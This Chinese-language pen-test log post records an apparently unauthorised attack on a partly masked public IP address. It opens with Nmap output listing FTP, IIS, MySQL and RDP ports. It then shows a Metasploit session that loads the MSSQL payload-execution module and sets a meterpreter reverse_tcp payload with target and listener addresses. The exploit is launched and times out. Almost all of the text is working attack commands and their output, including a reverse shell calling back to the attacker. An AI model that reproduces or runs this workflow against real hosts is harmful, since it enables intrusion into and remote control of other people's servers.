渗透杂记-2013-07-13 windows/mssql/mssql_payload

扫描一下
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [1000 ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp closed smtp
80/tcp open http Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_html-title: Site doesn't have a title (text/html).
110/tcp closed pop3
3306/tcp open mysql MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O
3389/tcp open microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 50.00 ms 203.171.239.*
Read data files from: D:\metasploit\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)
开始拿站
Welcome to the Metasploit Web Console!
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 296 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 296 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload
Name: Microsoft SQL Server Payload Execution
Version: 9669
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.osvdb.org/557
http://www.securityfocus.com/bid/1281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
http://www.osvdb.org/15757
http://www.securityfocus.com/bid/4797
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.